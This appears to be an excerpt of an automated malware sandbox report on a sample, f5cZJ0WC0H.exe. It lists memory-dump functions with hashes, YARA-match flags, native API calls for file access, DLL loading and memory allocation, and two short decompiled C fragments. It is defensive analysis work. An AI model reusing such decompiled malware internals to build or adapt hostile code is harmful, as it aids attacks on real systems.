                                                      • Opcode ID: 6eedfe3265a4570472280d4d22aaeb5a69e4ae50e7607cb9f273dbb4d073eb87
                                                      • Instruction ID: 9d188800f5fbca7602ba9c56634ad3e161b234c5a4bdabbd5842e19fa5c4aab5
                                                      • Opcode Fuzzy Hash: 6eedfe3265a4570472280d4d22aaeb5a69e4ae50e7607cb9f273dbb4d073eb87
                                                      • Instruction Fuzzy Hash: 0911DFB6C047598FCB10CF9AD444AEEFBF8EB88324F14841AD859A7610C375A546CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00EBD0E0, Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377411007.0000000000EBD000.00000040.00000001.sdmp, Offset: 00EBD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f71470ec96e9205abdad98fa945614c462e60fe318890f63de2c3f7224b0ad6a
                                                      • Instruction ID: a5321a561975dd95940925740a74c2902dbb8d8176dd1c64472e269ef2b4e650
                                                      • Opcode Fuzzy Hash: f71470ec96e9205abdad98fa945614c462e60fe318890f63de2c3f7224b0ad6a
                                                      • Instruction Fuzzy Hash: EE2125B5508244EFDB00DF18DDC0BA7BB65FB84318F24C5A9D9095B246D336D846CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00EBD0DB, Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.377411007.0000000000EBD000.00000040.00000001.sdmp, Offset: 00EBD000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 160c55156eb95c146c39425625c3806d82299980a852a736bf6cea8fd3a176a8
                                                      • Instruction ID: cc8c4d5f083a1007f906dd8ae39f216cbca4c488785f5794c4578fbb8cfd9bdc
                                                      • Opcode Fuzzy Hash: 160c55156eb95c146c39425625c3806d82299980a852a736bf6cea8fd3a176a8
                                                      • Instruction Fuzzy Hash: 31119075908280DFDB11CF14D9C4B56BF71FB84318F24C6A9D8494B656C33AD85ACBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Analysis Process: f5cZJ0WC0H.exe PID: 6952 Parent PID: 1268 f5cZJ0WC0H.exeCOMMON

                                                      Executed Functions

                                                      Function 00419FCB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 21%
                                                      			E00419FCB(void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				asm("out dx, al");
				_t13 = _a4;
				_t32 = _a4 + 0xc48;
				E0041AB20(_t30, _t13, _t32,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t31, _t34); // executed
				return _t18;
			}








                                                      0x00419fcd
                                                      0x00419fd3
                                                      0x00419fdf
                                                      0x00419fe7
                                                      0x00419ff2
                                                      0x0041a00d
                                                      0x0041a015
                                                      0x0041a019

                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: 281dbbc749f979fc6bedcc6790a5ecfb51adedd7a5c1d213caeaf868a75c54b3
                                                      • Instruction ID: 8e4cf4b82d85156bb2446e6a731f4473496e48ed0f8fdcbfa0ed6d91aa36dd0d
                                                      • Opcode Fuzzy Hash: 281dbbc749f979fc6bedcc6790a5ecfb51adedd7a5c1d213caeaf868a75c54b3
                                                      • Instruction Fuzzy Hash: FBF01DB2200104AFDB08DF89DC90EEB77AAEF8C354F05824DBA0D97251C630EC11CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419FD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 37%
                                                      			E00419FD0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB20(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                      0x00419fd3
                                                      0x00419fdf
                                                      0x00419fe7
                                                      0x00419ff2
                                                      0x0041a00d
                                                      0x0041a015
                                                      0x0041a019

                                                      APIs
                                                      • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 0041A015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: 2MA$2MA
                                                      • API String ID: 2738559852-947276439
                                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction ID: 629a420ec24cda59f7740677f87fbeb895876e778ce4a2e4436109007655ca88
                                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                      • Instruction Fuzzy Hash: 4BF0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419F20, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: wKA
                                                      • API String ID: 823142352-3165208591
                                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction ID: 918681b749d1ebc684007e4c1563b975095bc633172356dce6c62aeb4b4fe286
                                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                      • Instruction Fuzzy Hash: 2DF0B2B2205208ABCB08CF89DC95EEB77ADAF8C754F158249BA0D97241C630F851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00419F72, Relevance: 1.5, APIs: 1, Instructions: 49filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419F6D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: f15830d4444844ffdc0beff8450139817a952b4176aa1ea4a0c6281064f0bf72
                                                      • Instruction ID: 571e54225e9a84c50c064e397d93fbff457028bc279ef30381ad58d3682feb45
                                                      • Opcode Fuzzy Hash: f15830d4444844ffdc0beff8450139817a952b4176aa1ea4a0c6281064f0bf72
                                                      • Instruction Fuzzy Hash: B50116B2604108AFCB18DF99DC81EEB77A9AF8C724F158249FA1DD7241C630E811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
                                                      • Instruction ID: c5c621940a57d17f66b12aa8049194c8c7dd627cdda69f22228ad45a8916282e
                                                      • Opcode Fuzzy Hash: e3cd5c4db0597c13a36a0f1186f7e6d3a125332047fb9a142850906abfde767f
                                                      • Instruction Fuzzy Hash: 9F0112B5D4020DA7DB10EBE5DC82FDEB7799B54308F0041AAE908A7281F635EB54C795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A0FA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: a19a9a3ae40787789c4ca0ed9c00c04bdc2201e018a114e2c346f844656288dd
                                                      • Instruction ID: 97542a015bcf4af9255fb6ea6bd5923b4e071d1999698dcaab2582627b82682b
                                                      • Opcode Fuzzy Hash: a19a9a3ae40787789c4ca0ed9c00c04bdc2201e018a114e2c346f844656288dd
                                                      • Instruction Fuzzy Hash: D8F05EB1200108AFDB14DF99CC45EEB77B9EF88354F15815DFA09A7241C636E811CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A100, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041ACF4,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 0041A139
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction ID: b7acdae8d3035396bf3a6cabd8be047a375e4a620bd0b44aa6ca3e6eeb15d15e
                                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                      • Instruction Fuzzy Hash: 35F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F810CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A04E, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: f98400962133b53badd0b1044dd544b390ab3cad03e846cd19baea7985819aa8
                                                      • Instruction ID: 0aea7db4517e1d8f192aa3b1af7a0cd7a15af9a0d871c41797294b2989b1bf48
                                                      • Opcode Fuzzy Hash: f98400962133b53badd0b1044dd544b390ab3cad03e846cd19baea7985819aa8
                                                      • Instruction Fuzzy Hash: 0FD01776200218BBE710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A050, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 0041A075
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID:
                                                      • API String ID: 3535843008-0
                                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction ID: b02a98072ae76633dfac5978dec5414655e95fa3032167deae29744f36717898
                                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                      • Instruction Fuzzy Hash: B7D01776200214ABD710EB99DC85FE77BADEF48764F15449ABA189B242C530FA1087E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f8f3fddeb0e9e62ab3e68e086503c2523d3424adb7c16fd1fe1ed75944782615
                                                      • Instruction ID: bb0c33b298e4b371b552dd78a12cfac85b8108857491959cf55bd3577a856d0b
                                                      • Opcode Fuzzy Hash: f8f3fddeb0e9e62ab3e68e086503c2523d3424adb7c16fd1fe1ed75944782615
                                                      • Instruction Fuzzy Hash: DE9002B130100802D544719A55047460009A7D0341F51C015A5455554ECB9A8DE576A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f956f83cdc3b6c4ebfeb83fcc144ea953825b6f0986441757de724ef6d9fab65
                                                      • Instruction ID: 0e4f50035494d14098ec3471235e3a6ab613fd0f8d861aadd7d76a173a84dbde
                                                      • Opcode Fuzzy Hash: f956f83cdc3b6c4ebfeb83fcc144ea953825b6f0986441757de724ef6d9fab65
                                                      • Instruction Fuzzy Hash: 2E9002A134100842D504619A5514B060009E7E1341F51C019E1455554DCB5ACC627166
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1d0e7750b204099d739529f408644c204a949a56f101fa2f733daef1ae28b775
                                                      • Instruction ID: 155b021fc12d7d791bbda0d29363d40638f927cdcb0abb8c62967fd88b7f7836
                                                      • Opcode Fuzzy Hash: 1d0e7750b204099d739529f408644c204a949a56f101fa2f733daef1ae28b775
                                                      • Instruction Fuzzy Hash: 11900261342045525949B19A5504507400AB7E0281791C016A1805950CCA679866E661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0776f73f3bcf053047aff79aeb94cf40a00f5a98aa13458022177824dc84fdc9
                                                      • Instruction ID: f36ff7a0d705ef4f1ef03665dc294ecf1649f149bd72fe0a472dd56c80fdd238
                                                      • Opcode Fuzzy Hash: 0776f73f3bcf053047aff79aeb94cf40a00f5a98aa13458022177824dc84fdc9
                                                      • Instruction Fuzzy Hash: AD90027130100813D515619A5604707000DA7D0281F91C416A0815558DDB978962B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d5bc254ced7d3c63fb67ce11f7d9d0df582a9eaa2138cdf259dac090975d6473
                                                      • Instruction ID: 9d5fba7ba1cadbd569960ded02a351b8d68b06fa6232cb46849878ad2b876c23
                                                      • Opcode Fuzzy Hash: d5bc254ced7d3c63fb67ce11f7d9d0df582a9eaa2138cdf259dac090975d6473
                                                      • Instruction Fuzzy Hash: CB90026170100902D505719A5504616000EA7D0281F91C026A1415555ECF6689A2B171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2f3fdf2b2805d97d2acc3fe79b7ed65323101542549afcfc153dd407c78147bc
                                                      • Instruction ID: 432a8bba4f1959bc5cc920131945690e1718918dca03fd7af9328744f814fb37
                                                      • Opcode Fuzzy Hash: 2f3fdf2b2805d97d2acc3fe79b7ed65323101542549afcfc153dd407c78147bc
                                                      • Instruction Fuzzy Hash: BD90027130140802D504619A591470B0009A7D0342F51C015A1555555DCB66886175B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c614be5e7071c78f03e03ceba6fcde7d7aa453da1014dad068e45ea27fc22cf2
                                                      • Instruction ID: dcd6b6046f38a2df0d23c49022a4f367c3d8fdf20df50f8b56f95124dad212ca
                                                      • Opcode Fuzzy Hash: c614be5e7071c78f03e03ceba6fcde7d7aa453da1014dad068e45ea27fc22cf2
                                                      • Instruction Fuzzy Hash: 3490026170100442454471AA99449064009BBE1251751C125A0D89550DCA9A887566A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: d2a3daa10bee58eae1ce9423c6f956736e1757c1b80c8b63e1395b3233ca5c83
                                                      • Instruction ID: c2a1d0860ad5992d4230746aee8af0c42aa34a29c1f75f09953e006bd46d294a
                                                      • Opcode Fuzzy Hash: d2a3daa10bee58eae1ce9423c6f956736e1757c1b80c8b63e1395b3233ca5c83
                                                      • Instruction Fuzzy Hash: 3090026131180442D60465AA5D14B070009A7D0343F51C119A0545554CCE5688716561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: da38b8d79691d8f121697f2b8bea231a15d8a3955cf8a92e5bbe62e81bdf7db3
                                                      • Instruction ID: 17b60c2d2d77565ae8ff779f151f6b1de43e9cf9252de774fdc3d365390f916b
                                                      • Opcode Fuzzy Hash: da38b8d79691d8f121697f2b8bea231a15d8a3955cf8a92e5bbe62e81bdf7db3
                                                      • Instruction Fuzzy Hash: 15900265311004030509A59A1704507004AA7D5391351C025F1406550CDB6288716161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a0873d9f8e0d99bab64e9bf7573a1ff32ad747eab350c1f597d7f3c921bdead1
                                                      • Instruction ID: 1c78261e1c1858cc0c86bf590ce636940639a6a41c6aa82ce6174213750b6075
                                                      • Opcode Fuzzy Hash: a0873d9f8e0d99bab64e9bf7573a1ff32ad747eab350c1f597d7f3c921bdead1
                                                      • Instruction Fuzzy Hash: F49002A1302004034509719A5514616400EA7E0241B51C025E1405590DCA6688A17165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7cde3c54ca7b5eeeab48f8cb8cd9ce23708a51cb235be05116a6c44fb4822b55
                                                      • Instruction ID: f44ea25c8594d208e5d9acf5be9f88b30eaf7c754377fe24b3baf92fe5eb762b
                                                      • Opcode Fuzzy Hash: 7cde3c54ca7b5eeeab48f8cb8cd9ce23708a51cb235be05116a6c44fb4822b55
                                                      • Instruction Fuzzy Hash: E890027130100802D50465DA65086460009A7E0341F51D015A5415555ECBA688A17171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 772839ec3d7dee52b2ebc8be1e2b5bfdfc66b08db31a816c1dd3dd8728707552
                                                      • Instruction ID: 25c5c94774f98f1a6ceac27b3d36f63ac3b0dc33dd073f1b9ba7a77e06dbe306
                                                      • Opcode Fuzzy Hash: 772839ec3d7dee52b2ebc8be1e2b5bfdfc66b08db31a816c1dd3dd8728707552
                                                      • Instruction Fuzzy Hash: BC90026931300402D584719A650860A0009A7D1242F91D419A0406558CCE5688796361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b7a14298f0059e66a6ccd54fbc07bfafc47b876a9eaff68dc99f36cd68af1c64
                                                      • Instruction ID: 434c374bc4e517e61daa1d404e6206db30cf2865dc37db015f9b47e2e110c88f
                                                      • Opcode Fuzzy Hash: b7a14298f0059e66a6ccd54fbc07bfafc47b876a9eaff68dc99f36cd68af1c64
                                                      • Instruction Fuzzy Hash: 9890026130100403D544719A65186064009F7E1341F51D015E0805554CDE5688666262
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01159660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 48dc4b8b259444eebe6391e09f1ab49332c6cf05525ee00845a79c38469afa95
                                                      • Instruction ID: a923b7c49f61af7b648a5094a9054fb991d2fd540bdd56bb2dcd730a624ab8bd
                                                      • Opcode Fuzzy Hash: 48dc4b8b259444eebe6391e09f1ab49332c6cf05525ee00845a79c38469afa95
                                                      • Instruction Fuzzy Hash: 5090027130100C02D584719A550464A0009A7D1341F91C019A0416654DCF568A6977E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8e43f33182dab284be7dd8f7578bfaf10239ca689cd05fe9b1772b7872c2e2bc
                                                      • Instruction ID: 617c7afba440ddc94bea8a86ada617610b9ff481d48944a5540a924f2c9f5089
                                                      • Opcode Fuzzy Hash: 8e43f33182dab284be7dd8f7578bfaf10239ca689cd05fe9b1772b7872c2e2bc
                                                      • Instruction Fuzzy Hash: 0590027130108C02D514619A950474A0009A7D0341F55C415A4815658DCBD688A17161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1bb275caa1728f5d5dd2494ae45ec2efdf94fc32c2d0c30b4409020cef5f3e0
                                                      • Instruction ID: f493815993e4fc4c3a6875a07b94849432042e8d3b26fb879fc08bb4095ad030
                                                      • Opcode Fuzzy Hash: c1bb275caa1728f5d5dd2494ae45ec2efdf94fc32c2d0c30b4409020cef5f3e0
                                                      • Instruction Fuzzy Hash: D7213AB2D4020857CB15DA64AD42BEF73BCAB54304F04007FE949A7182F63CBE498BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A335, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.437203324.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID: AP
                                                      • API String ID: 3899507212-2793870665
                                                      • Opcode ID: e11cd8ce792489e7f0247288d109cc12e7b30c60644da3b598ec523b86386c7d
                                                      • Instruction ID: 0aeed14f8f14a861a1771632da5fc79e280681a2740850a6af029c86995d3e36
                                                      • Opcode Fuzzy Hash: e11cd8ce792489e7f0247288d109cc12e7b30c60644da3b598ec523b86386c7d
                                                      • Instruction Fuzzy Hash: 79015EB52001086FCB10DF59DC80DEB77A9AF88314F11815AFD0C97341C634E865CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

